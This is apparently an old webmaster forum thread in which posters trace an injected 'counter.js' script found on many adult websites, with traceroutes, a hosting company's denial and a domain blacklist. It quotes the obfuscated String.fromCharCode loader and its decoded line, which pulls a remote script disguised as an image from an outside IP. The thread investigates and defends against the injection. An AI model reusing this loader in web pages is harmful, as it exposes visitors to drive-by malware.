http://66.40.16.194/counter.js
 

http://66.40.16.194/counter.js

Does this belong to Paycounter?

traceroute to 66.40.16.194 (66.40.16.194), 32 hops max, 38 byte packets
1 ge.m20.access.science.giga.belnet.net (193.190.198.3) 1.111 ms
2 oc48.m160.core.science.giga.belnet.net (193.191.1.65) 0.306 ms
3 g2-1.c12410.science.belnet.net (193.191.201.69) 0.248 ms
4 adm-b1-pos1-3.telia.net (213.248.72.1) 3.651 ms
5 adm-bb2-pos1-0-0.telia.net (213.248.72.141) 3.756 ms
6 ldn-bb2-pos1-1-0.telia.net (213.248.64.122) 11.419 ms
7 nyk-bb2-pos2-3-0.telia.net (213.248.65.38) 83.869 ms
8 nyk-bb1-pos1-0-0.telia.net (213.248.80.13) 83.539 ms
9 chi-bb1-pos0-1-0.telia.net (213.248.80.6) 103.238 ms
10 williams.telia.net (213.248.84.74) 103.420 ms
11 chcgil1wcx3-oc48.wcg.net (64.200.103.78) 149.232 ms
12 snfcca1wcx3-oc48.wcg.net (64.200.240.94) 149.201 ms
13 sntcca2lce1-oc48.wcg.net (64.200.210.178) 149.014 ms
14 sntcca2lce1-hostcentric-gige.wcg.net (64.200.150.34) 149.110 ms
15 GE6-0.FMT-2.hostcentric.com (66.40.24.109) 149.328 ms
16 VLAN3.FMT6509-1.hostcentric.com (66.40.24.106) 149.557 ms
17 main1.bastun.net (66.40.16.194) 149.585 ms

On that page:

String.fromCharCode(100,111,99,117,109,101,110,116 ,46,119,114,105,116,101,40,39,60,115,99,114,105,11 2,116,32,108,97,110,103,117,97,103,101,61,106,115, 99,114,105,112,116,46,101,110,99,111,100,101,32,11 5,114,99,61,104,116,116,112,58,47,47,50,48,53,46,4 9,51,52,46,49,56,50,46,49,53,49,47,97,100,115,50,4 7,104,115,116,103,47,109,99,104,100,47,97,51,46,10 6,112,103,62,60,47,115,99,114,105,112,116,62,39,41 ,59));


Which evaluates to the following string:

document.write( "&ltscript language=jscript.encode src=http://205.134.182.151/ads2/hstg/mchd/a3.jpg>&lt/script>' );

This loads http://205.134.182.151/ads2/hstg/mchd/a3.jpg as the source for a javascript. Most likely a program to add bookmarks or change people's homepage. This resolves to an image though... It's definately not something by Paycounter

Tam from rudebitch.com had that I found it for her and someone went in and put that into her webpages if you have it in yuor index.html etc.. get rid of it. it will steal your traffic.

TOM

That is so strange about it that it only loads an image file. The file http://66.40.16.194/counter.js shows up on a lot of pages. When it's loading most virus scanners report that the JS/Seeker.gen.h virus has been found. On all the pages where I find the counter.js file is also a Paycounter installed as far as I can remember. To me it looks like it has to do something with eachother. Check for example this page:

http://devinn.miraclecreations.com/dl.htm

ip-address of paycounter.com = 66.77.141.20

This is interesting. How the hack did it come in her source codes? As I said before, this code can be found in a lot of web pages!

dsAbsolutely Not. I don't know what that is, but it has nothing to do with us. The only think we install is code that pulls the counter image from count.paycounter.com

do a traceroute to count.paycounter.com and you'll see the traceroutes look nothing alike.

We don't automatically install anything. The only code that goes on our users pages is the code that they copy and paste directly.

-KC

ok KC thanks for your reply!

anyhow I have found some real intersting stuff
check this directory: http://205.134.182.151/ads_xx/
in the file local there is a bunch of code, inclusive many domain names which ALL do have the code http://66.40.16.194/counter.js installed !!!!!

inclusive miraclecreations.com Very nice I can now add them all to my blacklist.

miraclecreations.com
amateurcreation.com
asianmaniacs.com
badgays.com
mightyhardcore.com
sex-creatures.com
sexcreation.com
x-ebony.com
sexcitymaster.com
sexyfreehardcore.com
wetsexy-girls.com
wetsexyporn.com
whole-teens.com
x-s-x.com
abedgirls.com
xxx-shot.com
eroticlace.com
sex-lack.com
sweetlesbs.com
weteuros.com
yetyoung.com
flowsex.com
teen-sex-orgy.com
hardcoresexfucking.com
allpuresex.com
pure-sex-pussy.com
pure-hardcore-sex.com
lesbian-sex-world.com
backyoungteens.com
black-free-sex.com
amateurs-4free.com
fetish-hardcore-sex.com
free-toys-4sex.com
groupsexaction.com
bastun.net
hornydemon.com
frontsex.com
21centuryhost.com
thehappygirls.com
teenspys.com
coolxxxporn.com
gethardporn.com
hardporncity.com
hardpornfree.com
hardpornnet.com
wethost.com
amateursex-4u.com
analsexcity.com
asiansex-4u.com
babesnation.com
blacksex-site.com
fetish-4u.com
gaysexnation.com
hardcore-4u.com
lesbiansex4u.com
maturewomenzone.com
oralsexcity.com
teensexnation.com
amateursexzone.com
asianporn4u.com
asianporncity.com
asianteencity.com
coolbigboobs.com
cumshotnation.com
ebonysexcity.com
fetishsex4u.com
freesexnation.com
freexxxcity.com
lesbosex4u.com
lesbosexcity.com
teensexforall.com
teensexsupersite.com
xxxporncenter.com
xxxsex4u.com
livesexnation.com
ifindmore.com
findmore.com
asianxxxnet.com
ezlesbiansex.com
getasiansex.com
getxxxhardcore.com
teensextown.com
thexxxporn.com
xxxhardcore4u.com
xxxporn4all.com
xxxporndrive.com
yourteensex.com
doom.bastun.net
free-hardcore-lesbian.com
free-virtual-xxx.com
hotcyberxxx.com
topteenxxx.com
www.get-free-xxx.com
hardcore-teen-fucking.com

I'm checking out the rest of this shit and which company it is running

Well... i've seen people creating .jpg's, and if you load them, by just loading them with internex explorer like a normal picture, they'll install a virus on your computer allowing virus clients to log in, but they will also just show a picture. No joking... if you don't have the right patches installed, .jpg's can really harm your puter.

that eval javascript string..

converts to this:

PHP Code:

---

document.write('<script language=jscript.encode src=http://205.134.182.151/ads2/hstg/mchd/a3.jpg></script>'); 


---

Here's a trace from one of our servers to his. He's on the East Coast someplace.

traceroute to 205.134.182.151 (205.134.182.151), 64 hops max, 40 byte packets
1 norcal.oc192.2.xfrnetworks.com (63.146.168.2) 0.363 ms 0.390 ms 0.272 ms
2 cntr-02.jsv.qwest.net (66.77.106.137) 0.282 ms 0.294 ms 0.204 ms
3 svl-core-03.inet.qwest.net (205.171.14.5) 0.366 ms 0.485 ms 0.382 ms
4 pax-brdr-02.inet.qwest.net (205.171.205.30) 1.019 ms 0.921 ms 0.822 ms
5 snfccapaix-qwest-pos.wcg.net (64.200.199.125) 1.090 ms 0.913 ms 0.915 ms
6 sntcca2lce1-oc48.wcg.net (64.200.210.177) 71.461 ms 71.699 ms 71.667 ms
7 snfcca1wcx2-oc48.wcg.net (64.200.199.73) 71.468 ms 71.308 ms 71.377 ms
8 anhmca1wcx3-oc48.wcg.net (64.200.240.1) 140.419 ms 142.986 ms 199.567 ms
9 hrndva1wcx2-oc48.wcg.net (64.200.240.30) 71.357 ms 71.346 ms 71.416 ms
10 hrndva1wcx3-pos9-0.wcg.net (64.200.95.134) 71.434 ms 71.452 ms 71.288 ms
11 washdc7lce1-oc48.wcg.net (64.200.95.94) 71.167 ms 71.096 ms 71.075 ms
12 washdc7lce1-yipes-gige.wcg.net (64.200.94.230) 71.303 ms 71.331 ms 71.493 ms
13 63.210.28.201 (63.210.28.201) 74.156 ms 72.118 ms 72.215 ms
14 63.210.28.199 (63.210.28.199) 72.413 ms 72.434 ms 72.240 ms
15 63.210.28.198 (63.210.28.198) 72.759 ms 73.321 ms 72.943 ms
16 east0.cluster.oc48.ai.net (205.134.160.25) 74.052 ms 75.916 ms 74.537 ms
17 205.134.182.151 (205.134.182.151) 74.808 ms 74.759 ms 74.856 ms

I'm curious about how the hell they got installed on so many pages without the webmasters knowing.

If you've found one on your page, what editor do you use? Frontpage or something? Maybe a Frontpage virus that proliferates a much bigger virus?

Do you mean on MY site ????
I don't hope so and can't find it

How is this guy getting them installed on so many pages?

found a link in my database hosted on one of the other domain names and it contains the counter.js file
http://pornstar.sexcreation.com/ashlyngere.html
it's clear to me that you can blacklist all these domain names. I'm not sure yet what the script exactly does, but your visitors won't like it to being redirected to a page with a virus warning.

... pretty interesting shit, but I just can´t find out what that script does ...

has anyone red the source code?